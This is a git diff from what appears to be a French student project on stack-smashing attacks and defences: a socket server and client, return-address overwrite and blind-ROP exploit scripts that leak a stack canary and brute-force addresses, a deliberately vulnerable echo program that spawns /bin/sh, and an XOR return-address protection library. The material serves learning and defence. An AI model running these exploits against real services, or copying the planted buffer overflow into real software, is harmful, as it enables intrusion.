int main(int argc, char * argv[]) {
|
||||
if (argc != 2) {
|
||||
printf("ERREUR : Usage : ./serveur N°Port\n");
|
||||
exit(2);
|
||||
}
|
||||
|
||||
// install a handler for SIGSEGV in a part of your code
|
||||
if(signal(SIGSEGV,&handle_sigsegv)==SIG_ERR)
|
||||
{
|
||||
fprintf(stderr,"Could not install SIGSEGV handler");
|
||||
return -1;
|
||||
}
|
||||
|
||||
// On crée le socket local
|
||||
int sock = socket(AF_INET, SOCK_STREAM, 0);
|
||||
if (sock == -1) {
|
||||
printf("ERREUR lors de la création du socket\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// On cree l'adresse du socket local
|
||||
struct sockaddr_in addr_local;
|
||||
int binder;
|
||||
|
||||
addr_local.sin_family = AF_INET;
|
||||
addr_local.sin_port = atoi(argv[1]);
|
||||
addr_local.sin_addr.s_addr = INADDR_ANY;
|
||||
|
||||
//On bind l'adresse du socket créee avec le socket local
|
||||
binder = bind(sock,(struct sockaddr *) &addr_local, sizeof(struct sockaddr_in));
|
||||
if (binder == -1){
|
||||
printf("ERREUR lors du bind du socket\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
//Initialisation file d'attente
|
||||
listen(sock, 100);
|
||||
|
||||
// Variable de stockage de l'addresse emmeteur
|
||||
struct sockaddr_in addr_em;
|
||||
unsigned int longueur_addr_em = sizeof(struct sockaddr_in);
|
||||
|
||||
// On se met en état d'acceptation de connexion (et on crée un socket en passant)
|
||||
int pid = 1;
|
||||
int nb_connexions = 0;
|
||||
while (pid != 0){
|
||||
|
||||
int sock_connexion = accept(sock, (struct sockaddr *)&addr_em, &longueur_addr_em);
|
||||
nb_connexions++;
|
||||
pid = fork();
|
||||
|
||||
if (pid == -1){
|
||||
printf("ERREUR lors du fork\n");
|
||||
exit(1);
|
||||
} else if (pid == 0) {
|
||||
if (sock_connexion == -1) {
|
||||
printf("ERREUR lors de l'acceptation de la connexion\n");
|
||||
exit(1);
|
||||
} else {
|
||||
// Traitement de la connexion
|
||||
process(sock_connexion);
|
||||
}
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
118
attaque.c
118
attaque.c
|
|
@ -1,69 +1,71 @@
|
|||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
#define LATENCE 10000
|
||||
#define FAT_LATENCE 1000000
|
||||
#define FUNCTION usleep
|
||||
#define SIZE_BUFF 228
|
||||
#define NUM_PORT 1258
|
||||
|
||||
int main(int argc, char * argv[]) {
|
||||
char prog_name[30];
|
||||
sprintf(prog_name, "./client localhost %d", NUM_PORT);
|
||||
// On ajoute 100 a la valeur
|
||||
FILE * prog = popen(prog_name, "w");
|
||||
/**
|
||||
* Lance un client, exécute une commande, puis quitte le client
|
||||
* @param host L'adresse du serveur
|
||||
* @param port Le port sur lequel se connecter
|
||||
* @param cmd La commande à exécuter
|
||||
* @return Le statut du client
|
||||
*/
|
||||
int runClientWithCommand(char *host, char *port, char *cmd) {
|
||||
// Démarrage du client
|
||||
char prog_name[100];
|
||||
sprintf(prog_name, "./client %s %s", host, port);
|
||||
|
||||
// Récupération de l'entrée standard
|
||||
FILE *prog = popen(prog_name, "w");
|
||||
usleep(1000);
|
||||
if (prog == NULL) {
|
||||
printf("ERREUR\n");
|
||||
return -1;
|
||||
}
|
||||
FUNCTION(LATENCE);
|
||||
fprintf(prog, "ADD\n");
|
||||
printf("ADD\n");
|
||||
FUNCTION(LATENCE);
|
||||
fprintf(prog, "100\n");
|
||||
printf("100\n");
|
||||
FUNCTION(LATENCE);
|
||||
pclose(prog);
|
||||
|
||||
// On affiche la valeur
|
||||
prog = popen(prog_name, "w");
|
||||
if (prog == NULL) {
|
||||
printf("ERREUR\n");
|
||||
}
|
||||
FUNCTION(LATENCE);
|
||||
fprintf(prog, "PRINT\n");
|
||||
printf("PRINT\n");
|
||||
FUNCTION(LATENCE);
|
||||
pclose(prog);
|
||||
// Écriture de la commande
|
||||
fprintf(prog, "%s", cmd);
|
||||
printf("%s", cmd);
|
||||
|
||||
// On hack pour RESET
|
||||
prog = popen(prog_name, "w");
|
||||
if (prog == NULL) {
|
||||
printf("ERREUR\n");
|
||||
}
|
||||
FUNCTION(LATENCE);
|
||||
char buff[SIZE_BUFF + 1];
|
||||
int i;
|
||||
for (i=0; i<(SIZE_BUFF / 4); i++) {
|
||||
buff[(i*4)] = 0xef;
|
||||
buff[(i*4) + 1] = 0xca;
|
||||
buff[(i*4) + 2] = 0x5c;
|
||||
buff[(i*4) + 3] = 0x56;
|
||||
}
|
||||
buff[SIZE_BUFF] = '\0';
|
||||
fprintf(prog, "%s\n", buff);
|
||||
printf("Hack : %s\n%x%x%x%x\n", buff, buff[0], buff[1], buff[2], buff[3]);
|
||||
FUNCTION(LATENCE);
|
||||
pclose(prog);
|
||||
usleep(1000);
|
||||
|
||||
// On Affiche pour verifier
|
||||
prog = popen(prog_name, "w");
|
||||
if (prog == NULL) {
|
||||
printf("ERREUR\n");
|
||||
}
|
||||
FUNCTION(LATENCE);
|
||||
fprintf(prog, "PRINT\n");
|
||||
printf("PRINT\n");
|
||||
FUNCTION(LATENCE);
|
||||
pclose(prog);
|
||||
// Fermeture du client
|
||||
fprintf(prog, "QUIT\n");
|
||||
printf("QUIT\n");
|
||||
return pclose(prog);
|
||||
}
|
||||
|
||||
void hackServer(char *host, char *port, long addr) {
|
||||
printf("-- Écrasement de l'adresse de retour par %p --\n", (void *) addr);
|
||||
char buf[100];
|
||||
// L'index 134 du tableau correspond à l'adresse de retour
|
||||
sprintf(buf, "WRITE %ld 134\n", addr);
|
||||
runClientWithCommand(host, port, buf);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[]) {
|
||||
if (argc != 3) {
|
||||
printf("Usage : ./attaque addresseServeur portServeur\n");
|
||||
return 2;
|
||||
}
|
||||
int port = atoi(argv[2]);
|
||||
if (port <= 0 || port > 65535) {
|
||||
printf("Usage : ./attaque addresseServeur portServeur\n");
|
||||
return 3;
|
||||
}
|
||||
|
||||
// Adresse à modifier avec l'adresse d'une fonction du serveur
|
||||
long address = 0xffffffff;
|
||||
hackServer(argv[1], argv[2], address);
|
||||
|
||||
// long begin = 1448463905;
|
||||
// long end = 1449434657;
|
||||
// printf("testing %ld possibilities...\n", end - begin);
|
||||
//
|
||||
// for (long addr = begin; addr < end; ++addr) {
|
||||
// runClient(argv[1], argv[2], addr);
|
||||
// }
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
|
|
|||
26
attaque_brop/README.md
Normal file
26
attaque_brop/README.md
Normal file
|
|
@ -0,0 +1,26 @@
|
|||
# Attaque "blind ROP"
|
||||
## Instructions
|
||||
### Compilation du programme vulnérable :
|
||||
`gcc echo.c -o echo`
|
||||
|
||||
### Installation du module python pwn
|
||||
`pip install pwn`
|
||||
|
||||
### Lancement du programme vulnérable en le liant à un port tcp
|
||||
`socat -v tcp-l:31337,fork exec:'./echo'`
|
||||
|
||||
### Attaque
|
||||
`python3 attaque.py`
|
||||
|
||||
On peut ajouter `DEBUG` en paramètre pour voir les données envoyées
|
||||
et reçues.
|
||||
|
||||
## Résultats
|
||||
On peut exécuter la fonction C `brop()` en écrasant l'adresse
|
||||
de retour par son adresse. Pour cela, on récupère d'abord le canary,
|
||||
puis la véritable adresse de retour. On peut ensuite écraser le
|
||||
canary et rbp par leur valeur, puis l'addresse de retour par sa
|
||||
valeur + un offset, et ce jusqu'à trouver `brop()`.
|
||||
On voit qu'on arrive à exécuter des instructions qui appartiennent
|
||||
à `brop()`, car on voit le print "brop".
|
||||
|
||||
68
attaque_brop/attaque.py
Normal file
68
attaque_brop/attaque.py
Normal file
|
|
@ -0,0 +1,68 @@
|
|||
from pwn import *
|
||||
|
||||
p = connect("127.0.0.1", 31337)
|
||||
|
||||
p.send(b'h')
|
||||
time.sleep(0.2)
|
||||
first_recv = p.recv(numb=10000, timeout=1)
|
||||
print(first_recv)
|
||||
|
||||
payload = b"A" * 4
|
||||
|
||||
# Leak the canary
|
||||
p.send(payload + b'\x01')
|
||||
time.sleep(0.2)
|
||||
leak = p.recv().strip(payload)
|
||||
print("leak = " + leak.hex(' '))
|
||||
|
||||
# Extract canary from the leak
|
||||
stack_canary = b'\x00' + leak[1:8]
|
||||
print("canary = " + stack_canary.hex(' '))
|
||||
|
||||
# overwrite it with the same value to check that it is correct
|
||||
p.send(payload + stack_canary)
|
||||
time.sleep(0.2)
|
||||
received = p.recv()
|
||||
|
||||
if received != payload:
|
||||
print("[!] Failed to leak stack canary")
|
||||
exit(1)
|
||||
|
||||
print(f"[+] Stack canary is 0x{stack_canary.hex()}")
|
||||
|
||||
# Guess the program base address
|
||||
|
||||
# First address
|
||||
|
||||
p.send(payload + b"A" * 8)
|
||||
time.sleep(0.2)
|
||||
leak = p.recv().strip(b"A").strip(b"You broke the internet!\n")
|
||||
print(len(leak))
|
||||
rbp = leak + b"\x00" * (8 - len(leak))
|
||||
print(hex(int.from_bytes(rbp, "little", signed=False)))
|
||||
|
||||
# Second address
|
||||
|
||||
p.send(payload + b"A" * 16)
|
||||
time.sleep(0.2)
|
||||
leak = p.recv().strip(b"A").strip(b"You broke the internet!\n")
|
||||
print(len(leak))
|
||||
if len(leak) == 5:
|
||||
retAddress = b"\x00" + leak + b"\x00" * (7 - len(leak))
|
||||
else:
|
||||
retAddress = leak + b"\x00" * (8 - len(leak))
|
||||
print(hex(int.from_bytes(retAddress, "little", signed=False)))
|
||||
|
||||
# iterator = iter(range(0x1000))
|
||||
for offset in range(70, 150):
|
||||
testedAddr = (int.from_bytes(retAddress, "little") - offset).to_bytes(8, "little")
|
||||
print(f"----- testing address {hex(int.from_bytes(testedAddr, 'little', signed=False))} ------")
|
||||
p.send(payload + stack_canary + rbp + testedAddr) # + b"A" * 128)
|
||||
time.sleep(0.2)
|
||||
received = p.recv(timeout=0.5)
|
||||
print(received)
|
||||
if received.find(b"brop") != -1:
|
||||
print("#######################")
|
||||
#
|
||||
# 7ffe388f02c0
|
||||
# 55f8236e12aa
|
||||
38
attaque_brop/echo.c
Normal file
38
attaque_brop/echo.c
Normal file
|
|
@ -0,0 +1,38 @@
|
|||
#include <stdio.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/wait.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
int echo_service(){
|
||||
char x[4];
|
||||
read(0, x, 50);
|
||||
printf("%s", x);
|
||||
fflush(stdout);
|
||||
return 0;
|
||||
}
|
||||
|
||||
void brop() {
|
||||
system("/bin/sh");
|
||||
printf("brop");
|
||||
fflush(stdout);
|
||||
}
|
||||
|
||||
int main(void) {
|
||||
printf("%p\n", &main);
|
||||
printf("%p\n", &brop);
|
||||
printf("%lu\n", (unsigned long)&main - (unsigned long)&brop);
|
||||
fflush(stdout);
|
||||
while(1) {
|
||||
if (fork() == 0) {
|
||||
echo_service();
|
||||
return 0;
|
||||
}
|
||||
int status;
|
||||
wait(&status);
|
||||
if (status != 0) {
|
||||
puts("You broke the internet!");
|
||||
fflush(stdout);
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
|
@ -3,6 +3,7 @@
|
|||
#include <sys/types.h>
|
||||
/* constantes relatives aux domaines, types et protocoles */
|
||||
#include <sys/socket.h>
|
||||
#include <fcntl.h>
|
||||
/* constantes et structures propres au domaine INTERNET */
|
||||
#include <netinet/in.h>
|
||||
/* structures retournées par les fonctions de gestion de la base de
|
||||
|
|
@ -16,109 +17,131 @@
|
|||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
|
||||
int main (int argc, char * argv[]) {
|
||||
|
||||
int main(int argc, char *argv[]) {
|
||||
|
||||
if (argc != 3) {
|
||||
printf("ERREUR : Usage : ./client AdresseServeur N°Port\n");
|
||||
exit(2);
|
||||
}
|
||||
|
||||
int sock = socket(AF_INET, SOCK_STREAM, 0);
|
||||
if (sock == -1) {
|
||||
printf("ERREUR lors de la création du socket\n");
|
||||
exit(1);
|
||||
}
|
||||
int sock = socket(AF_INET, SOCK_STREAM, 0);
|
||||
if (sock == -1) {
|
||||
printf("ERREUR lors de la création du socket\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// On cree l'adresse du socket target
|
||||
struct sockaddr_in addr_target;
|
||||
|
||||
addr_target.sin_family = AF_INET;
|
||||
addr_target.sin_port = atoi(argv[2]);
|
||||
struct hostent * hoststruct = gethostbyname(argv[1]);
|
||||
|
||||
if (hoststruct == NULL){
|
||||
printf("ERREUR lors de la recherche de l'adresse IP du target\n");
|
||||
exit(1);
|
||||
addr_target.sin_port = htons(atoi(argv[2]));
|
||||
struct hostent *hoststruct = gethostbyname(argv[1]);
|
||||
|
||||
if (hoststruct == NULL) {
|
||||
printf("ERREUR lors de la recherche de l'adresse IP du target\n");
|
||||
exit(2);
|
||||
}
|
||||
|
||||
memcpy((char *)&(addr_target.sin_addr.s_addr), hoststruct->h_addr, hoststruct->h_length);
|
||||
memcpy((char *) &(addr_target.sin_addr.s_addr), hoststruct->h_addr, hoststruct->h_length);
|
||||
|
||||
int retour_connexion;
|
||||
//On fait de demande de connextion au socket target
|
||||
retour_connexion = connect(sock, (struct sockaddr *)&addr_target, sizeof(struct sockaddr_in));
|
||||
if (retour_connexion == -1){
|
||||
printf("ERREUR lors de la demande de connexion\n");
|
||||
exit(1);
|
||||
retour_connexion = connect(sock, (struct sockaddr *) &addr_target, sizeof(struct sockaddr_in));
|
||||
if (retour_connexion == -1) {
|
||||
printf("ERREUR lors de la demande de connexion\n");
|
||||
exit(3);
|
||||
}
|
||||
|
||||
printf("Que souhaitez vous faire : \n - READ 'index'\n - WRITE 'value' 'index'\n - ADD 'index1' 'index2' 'index3'\n - SUB 'index1' 'index2' 'index3'\n - MUL 'index1' 'index2' 'index3'\n - DIV 'index1' 'index2' 'index3'\n - LOWER 'index1' 'index2'\n - EQUAL 'index1' 'index2'\n - PRINT\n - QUIT\n");
|
||||
|
||||
int cont = 1;
|
||||
while (cont) {
|
||||
|
||||
while (1) {
|
||||
// Test si le serveur a crash
|
||||
usleep(100000);
|
||||
int oldflag = fcntl(sock, F_GETFL);
|
||||
char buff2[40] = "\0";
|
||||
fcntl(sock, F_SETFL, oldflag | O_NONBLOCK);
|
||||
if ((int) read(sock, buff2, 40) == 0) {
|
||||
printf("--- Socket closed ---\n");
|
||||
close(sock);
|
||||
exit(0);
|
||||
} else if (strcmp(buff2, "SEGFAULT") == 0) {
|
||||
printf("--- Segfault in server ---\n");
|
||||
close(sock);
|
||||
exit(4);
|
||||
}
|
||||
fcntl(sock, F_SETFL, oldflag);
|
||||
|
||||
// Lecture de la requette
|
||||
char requette[40];
|
||||
fgets(requette, 40, stdin);
|
||||
char requete[40];
|
||||
fgets(requete, 40, stdin);
|
||||
char req[10] = "\0";
|
||||
int param1 = -1;
|
||||
int param2 = -1;
|
||||
int param3 = -1;
|
||||
sscanf(requette, "%s %d %d %d", req, ¶m1, ¶m2, ¶m3);
|
||||
|
||||
sscanf(requete, "%s %d %d %d", req, ¶m1, ¶m2, ¶m3);
|
||||
|
||||
// Traitement de la requette
|
||||
char buff[40] = "\0";
|
||||
if (!strcmp(req, "READ")) {
|
||||
int nb_octets_envoyes;
|
||||
if (!strcmp(req, "READ") || !strcmp(req, "read")) {
|
||||
if (param1 < 0) {
|
||||
printf("ERROR SYNTAX\n");
|
||||
} else {
|
||||
sprintf(buff, "r.%d.0.0", param1);
|
||||
send(sock, buff, strlen(buff), 0);
|
||||
|
||||
read(sock, buff, 40);
|
||||
printf("Tableau[%d] = %s\n", param1, buff);
|
||||
nb_octets_envoyes = send(sock, buff, strlen(buff), 0);
|
||||
printf("nb_octets_envoyes = %d\n", nb_octets_envoyes);
|
||||
int bytesRead = read(sock, buff, 40);
|
||||
if (bytesRead > 0) {
|
||||
int val;
|
||||
printf("%s\n", buff);
|
||||
sscanf(buff, "%d", &val);
|
||||
printf("Tableau[%d] = %d\n", param1, val);
|
||||
} else {
|
||||
printf("Erreur lors du read\n");
|
||||
}
|
||||
}
|
||||
} else if (!strcmp(req, "WRITE")) {
|
||||
} else if (!strcmp(req, "WRITE") || !strcmp(req, "write")) {
|
||||
if (param2 < 0) {
|
||||
printf("ERROR SYNTAX\n");
|
||||
} else {
|
||||
sprintf(buff, "w.%d.%d.0", param1, param2);
|
||||
send(sock, buff, strlen(buff), 0);
|
||||
}
|
||||
} else if (!strcmp(req, "ADD")) {
|
||||
} else if (!strcmp(req, "ADD") || !strcmp(req, "add")) {
|
||||
if (param1 < 0 || param2 < 0 || param3 < 0) {
|
||||
printf("ERROR SYNTAX\n");
|
||||
} else {
|
||||
sprintf(buff, "a.%d.%d.%d", param1, param2, param3);
|
||||
send(sock, buff, strlen(buff), 0);
|
||||
}
|
||||
} else if (!strcmp(req, "SUB")) {
|
||||
} else if (!strcmp(req, "SUB") || !strcmp(req, "sub")) {
|
||||
if (param1 < 0 || param2 < 0 || param3 < 0) {
|
||||
printf("ERROR SYNTAX\n");
|
||||
} else {
|
||||
sprintf(buff, "s.%d.%d.%d", param1, param2, param3);
|
||||
send(sock, buff, strlen(buff), 0);
|
||||
}
|
||||
} else if (!strcmp(req, "MUL")) {
|
||||
} else if (!strcmp(req, "MUL") || !strcmp(req, "mul")) {
|
||||
if (param1 < 0 || param2 < 0 || param3 < 0) {
|
||||
printf("ERROR SYNTAX\n");
|
||||
} else {
|
||||
sprintf(buff, "m.%d.%d.%d", param1, param2, param3);
|
||||
send(sock, buff, strlen(buff), 0);
|
||||
}
|
||||
} else if (!strcmp(req, "DIV")) {
|
||||
} else if (!strcmp(req, "DIV") || !strcmp(req, "div")) {
|
||||
if (param1 < 0 || param2 < 0 || param3 < 0) {
|
||||
printf("ERROR SYNTAX\n");
|
||||
} else {
|
||||
sprintf(buff, "d.%d.%d.%d", param1, param2, param3);
|
||||
send(sock, buff, strlen(buff), 0);
|
||||
}
|
||||
} else if (!strcmp(req, "LOWER")) {
|
||||
} else if (!strcmp(req, "LOWER") || !strcmp(req, "lower")) {
|
||||
if (param1 < 0 || param2 < 0) {
|
||||
printf("ERROR SYNTAX\n");
|
||||
} else {
|
||||
sprintf(buff, "l.%d.%d.0", param1, param2);
|
||||
send(sock, buff, strlen(buff), 0);
|
||||
|
||||
|
||||
char retour[2];
|
||||
read(sock, retour, 2);
|
||||
char res[6];
|
||||
|
|
@ -131,13 +154,13 @@ int main (int argc, char * argv[]) {
|
|||
}
|
||||
printf("Tableau[%d] < Tableau[%d] => %s\n", param1, param2, res);
|
||||
}
|
||||
} else if (!strcmp(req, "EQUAL")) {
|
||||
} else if (!strcmp(req, "EQUAL") || !strcmp(req, "equal")) {
|
||||
if (param1 < 0 || param2 < 0) {
|
||||
printf("ERROR SYNTAX\n");
|
||||
} else {
|
||||
sprintf(buff, "e.%d.%d.0", param1, param2);
|
||||
send(sock, buff, strlen(buff), 0);
|
||||
|
||||
|
||||
char retour[2];
|
||||
read(sock, retour, 2);
|
||||
char res[6];
|
||||
|
|
@ -150,20 +173,16 @@ int main (int argc, char * argv[]) {
|
|||
}
|
||||
printf("Tableau[%d] == Tableau[%d] => %s\n", param1, param2, res);
|
||||
}
|
||||
} else if (!strcmp(req, "PRINT")) {
|
||||
} else if (!strcmp(req, "PRINT") || !strcmp(req, "print")) {
|
||||
sprintf(buff, "p.0.0.0");
|
||||
send(sock, buff, strlen(buff), 0);
|
||||
} else if (!strcmp(req, "QUIT")) {
|
||||
} else if (!strcmp(req, "QUIT") || !strcmp(req, "quit")) {
|
||||
sprintf(buff, "q.0.0.0");
|
||||
send(sock, buff, strlen(buff), 0);
|
||||
cont = 0;
|
||||
} else {
|
||||
printf("SYNTAX ERROR\n");
|
||||
}
|
||||
}
|
||||
|
||||
close(sock);
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
1
endCodeAddr
Normal file
1
endCodeAddr
Normal file
|
|
@ -0,0 +1 @@
|
|||
5598ef39a000
|
||||
1
endStackAddr
Normal file
1
endStackAddr
Normal file
|
|
@ -0,0 +1 @@
|
|||
7ffc973d6000
|
||||
3
lib/.gitignore
vendored
Normal file
3
lib/.gitignore
vendored
Normal file
|
|
@ -0,0 +1,3 @@
|
|||
test_avec_cipher
|
||||
test_sans_cipher
|
||||
test
|
||||
10
lib/Makefile
Normal file
10
lib/Makefile
Normal file
|
|
@ -0,0 +1,10 @@
|
|||
all: test
|
||||
|
||||
test_sans_cipher: test_chiffrement.c rondoudouPatch.c rondoudouPatch.h
|
||||
gcc -Wall -g test_chiffrement.c rondoudouPatch.c -DNOCIPHER -o test_sans_cipher
|
||||
|
||||
test_avec_cipher: test_chiffrement.c rondoudouPatch.c rondoudouPatch.h
|
||||
gcc -Wall -g test_chiffrement.c rondoudouPatch.c -o test_avec_cipher
|
||||
|
||||
clean:
|
||||
rm -f test
|
||||
118
lib/rondoudouPatch.c
Normal file
118
lib/rondoudouPatch.c
Normal file
|
|
@ -0,0 +1,118 @@
|
|||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdint.h>
|
||||
#include "rondoudouPatch.h"
|
||||
|
||||
//WARNING SUR TOUT LES TYPES !!!
|
||||
|
||||
#ifdef NOCIPHER
|
||||
|
||||
void cipher(void *address) {}
|
||||
void decipher() {}
|
||||
void rondoudou_patch_init() {}
|
||||
|
||||
#else
|
||||
|
||||
struct t_pile_addrs {
|
||||
int index;
|
||||
void **tab[TAB_SIZE];
|
||||
struct t_pile_addrs *next;
|
||||
};
|
||||
|
||||
uintptr_t rondoudou_patch_key;
|
||||
|
||||
struct t_pile_addrs *pile_addrs;
|
||||
|
||||
void rondoudou_patch_init(void) {
|
||||
pile_addrs = (struct t_pile_addrs *)malloc(sizeof(struct t_pile_addrs));
|
||||
pile_addrs->index = -1;
|
||||
pile_addrs->next = NULL;
|
||||
|
||||
rondoudou_patch_key = 12345;
|
||||
}
|
||||
|
||||
int print_pile_aux(int profondeur, struct t_pile_addrs * pile) {
|
||||
if (pile != NULL) {
|
||||
int prof_max = print_pile_aux(profondeur + 1, pile->next);
|
||||
int i;
|
||||
int max;
|
||||
if (pile->index != TAB_SIZE) {
|
||||
max = pile->index + 1;
|
||||
} else {
|
||||
max = TAB_SIZE;
|
||||
}
|
||||
for (i = 0; i<max; i++) {
|
||||
// printf("%d -> %p\n", (prof_max - profondeur)*TAB_SIZE + i, pile->tab[i]);
|
||||
}
|
||||
return prof_max;
|
||||
} else {
|
||||
return profondeur - 1;
|
||||
}
|
||||
}
|
||||
|
||||
void print_pile(void) {
|
||||
print_pile_aux(0, pile_addrs);
|
||||
}
|
||||
|
||||
/*
|
||||
*
|
||||
* ATTENTION !!!!! FONCTION ULTRA CHELOUE
|
||||
*
|
||||
*/
|
||||
void ** find_address_in_stack(void * addr) {
|
||||
void ** ret = 0;
|
||||
int trouve = 0;
|
||||
int i;
|
||||
for (i=0; i<1000; i++) {
|
||||
if ((*(&ret + i)) == addr) {
|
||||
if (trouve) {
|
||||
ret = (void **)(&ret + i);
|
||||
break;
|
||||
}
|
||||
trouve = 1;
|
||||
}
|
||||
}
|
||||
|
||||
return ret;
|
||||
}
|
||||
|
||||
void cipher(void * address) {
|
||||
void ** addr = find_address_in_stack(address);
|
||||
if (addr != 0) {
|
||||
*addr = (void *)((uintptr_t)*addr ^ (uintptr_t)rondoudou_patch_key);
|
||||
if ((pile_addrs->index) == (TAB_SIZE - 1)) {
|
||||
struct t_pile_addrs * aux = (struct t_pile_addrs *)malloc(sizeof(struct t_pile_addrs));
|
||||
aux->index = 0;
|
||||
aux->next = pile_addrs;
|
||||
pile_addrs = aux;
|
||||
} else {
|
||||
pile_addrs->index++;
|
||||
}
|
||||
pile_addrs->tab[pile_addrs->index] = addr;
|
||||
// printf("APPEL A CIPHER\n");
|
||||
print_pile();
|
||||
}
|
||||
}
|
||||
|
||||
void decipher(void) {
|
||||
if (pile_addrs->index == -1) {
|
||||
if (pile_addrs->next == NULL) {
|
||||
// printf("Ouille ouille ouille qu'est ce que j'ai mal aux nouilles ! \n");
|
||||
exit(2);
|
||||
} else {
|
||||
struct t_pile_addrs * aux = pile_addrs;
|
||||
pile_addrs = pile_addrs->next;
|
||||
free(aux);
|
||||
}
|
||||
}
|
||||
|
||||
*((pile_addrs->tab)[pile_addrs->index]) = (void *) ((uintptr_t) (*((pile_addrs->tab)[pile_addrs->index])) ^
|
||||
(uintptr_t) rondoudou_patch_key);
|
||||
pile_addrs->index--;
|
||||
// printf("APPEL A DECIPHER\n");
|
||||
print_pile();
|
||||
}
|
||||
|
||||
#endif // NOCIPHER
|
||||
|
||||
void changekey(void);
|
||||
7
lib/rondoudouPatch.h
Normal file
7
lib/rondoudouPatch.h
Normal file
|
|
@ -0,0 +1,7 @@
|
|||
#define TAB_SIZE 3
|
||||
|
||||
void cipher(void * addr);
|
||||
void decipher(void);
|
||||
void changekey(void);
|
||||
void rondoudou_patch_init(void);
|
||||
|
||||
34
lib/test_chiffrement.c
Normal file
34
lib/test_chiffrement.c
Normal file
|
|
@ -0,0 +1,34 @@
|
|||
#include "rondoudouPatch.h"
|
||||
#include <stdio.h>
|
||||
#include <time.h>
|
||||
|
||||
|
||||
int h(int a) {
|
||||
cipher(__builtin_return_address(0));
|
||||
if (a > 0) {
|
||||
int ret = h(a - 1);
|
||||
decipher();
|
||||
return ret;
|
||||
}
|
||||
decipher();
|
||||
return 5;
|
||||
}
|
||||
|
||||
char *ebp;
|
||||
char *esp;
|
||||
|
||||
int main() {
|
||||
struct timespec start, end;
|
||||
clock_gettime(CLOCK_MONOTONIC, &start);
|
||||
|
||||
rondoudou_patch_init();
|
||||
cipher(__builtin_return_address(0));
|
||||
for (int i = 0; i < 1000; ++i) {
|
||||
h(25);
|
||||
}
|
||||
decipher();
|
||||
|
||||
clock_gettime(CLOCK_MONOTONIC, &end);
|
||||
unsigned long ns = (end.tv_sec - start.tv_sec) * 1000000000ul + end.tv_nsec - start.tv_nsec;
|
||||
printf("%.3lfμs\n", (double) ns / 1000.0);
|
||||
}
|
||||
7
lib/test_perf.sh
Executable file
7
lib/test_perf.sh
Executable file
|
|
@ -0,0 +1,7 @@
|
|||
#!/bin/bash
|
||||
make test_avec_cipher
|
||||
make test_sans_cipher
|
||||
echo "-- Sans cipher --"
|
||||
./test_sans_cipher
|
||||
echo "-- Avec cipher --"
|
||||
./test_avec_cipher
|
||||
81
makefile
81
makefile
|
|
@ -1,81 +0,0 @@
|
|||
default:
|
||||
@echo "Usage : [ Classic | SansCanary | 32bits | 32bitsSansCanary | Attaque ]"
|
||||
|
||||
Classic: cleanServCli serveur client
|
||||
SansCanary: cleanServCli serveurSsCanary client
|
||||
32bits: cleanServCli serveur32 client32
|
||||
32bitsSansCanary: cleanServCli serveur32SsCanary client32
|
||||
|
||||
Attaque: cleanAttaque attaque.c
|
||||
@echo "######################################"
|
||||
@echo "# Compilation du programme ATTAQUANT #"
|
||||
@echo "######################################"
|
||||
@echo ""
|
||||
gcc -Wall attaque.c -o attaque
|
||||
@echo ""
|
||||
@echo ""
|
||||
|
||||
serveur: Serveur.c
|
||||
@echo "######################################"
|
||||
@echo "####### Compilation du SERVEUR #######"
|
||||
@echo "######################################"
|
||||
@echo ""
|
||||
gcc -Wall Serveur.c -o serveur
|
||||
@echo ""
|
||||
@echo ""
|
||||
|
||||
client: Client.c
|
||||
@echo "######################################"
|
||||
@echo "####### Compilation du CLIENT #######"
|
||||
@echo "######################################"
|
||||
@echo ""
|
||||
gcc -Wall Client.c -o client
|
||||
@echo ""
|
||||
@echo ""
|
||||
|
||||
serveur32: Serveur.c
|
||||
@echo "######################################"
|
||||
@echo "# Compilation du SERVEUR en 32 bits #"
|
||||
@echo "######################################"
|
||||
@echo ""
|
||||
gcc -Wall -m32 Serveur.c -o serveur
|
||||
@echo ""
|
||||
@echo ""
|
||||
|
||||
client32: Client.c
|
||||
@echo "######################################"
|
||||
@echo "## Compilation du CLIENT en 32 bits ##"
|
||||
@echo "######################################"
|
||||
@echo ""
|
||||
gcc -Wall -m32 Client.c -o client
|
||||
@echo ""
|
||||
@echo ""
|
||||
|
||||
serveurSsCanary: Serveur.c
|
||||
@echo "######################################"
|
||||
@echo "# Compilation du SERVEUR sans Canary #"
|
||||
@echo "######################################"
|
||||
@echo ""
|
||||
gcc -Wall -fno-stack-protector Serveur.c -o serveur
|
||||
@echo ""
|
||||
@echo ""
|
||||
|
||||
serveur32SsCanary: Serveur.c
|
||||
@echo "#################################################"
|
||||
@echo "# Compilation du SERVEUR en 32 bits sans Canary #"
|
||||
@echo "#################################################"
|
||||
@echo ""
|
||||
gcc -Wall -m32 -fno-stack-protector Serveur.c -o serveur
|
||||
@echo ""
|
||||
@echo ""
|
||||
|
||||
edit:
|
||||
pluma Serveur.c Client.c Attaque.c &
|
||||
|
||||
cleanAttaque:
|
||||
@rm -f attaque
|
||||
|
||||
cleanServCli:
|
||||
@rm -f client serveur
|
||||
|
||||
clean: cleanAttaque cleanServCli
|
||||
45
notesRuntimeASLR.md
Normal file
45
notesRuntimeASLR.md
Normal file
|
|
@ -0,0 +1,45 @@
|
|||
#Notes RuntimeASLR
|
||||
|
||||
RuntimeASLR des chercheurs déjà codé ---> RASLR1
|
||||
le notre --> RASLR2
|
||||
|
||||
|
||||
Dans RASLR1, il y a un mécanisme de tracking des pointeurs.
|
||||
|
||||
1ère phase --> Taint policy generation --> En gros, on va donner au système en input des programmes avec lesquels le il va apprendre le comportement des instructions Intel. Cela crée alors une politique de détection des pointeurs. Cela permet de ne pas se base uniquement sur le type des variables afin de déctecter les pointeurs
|
||||
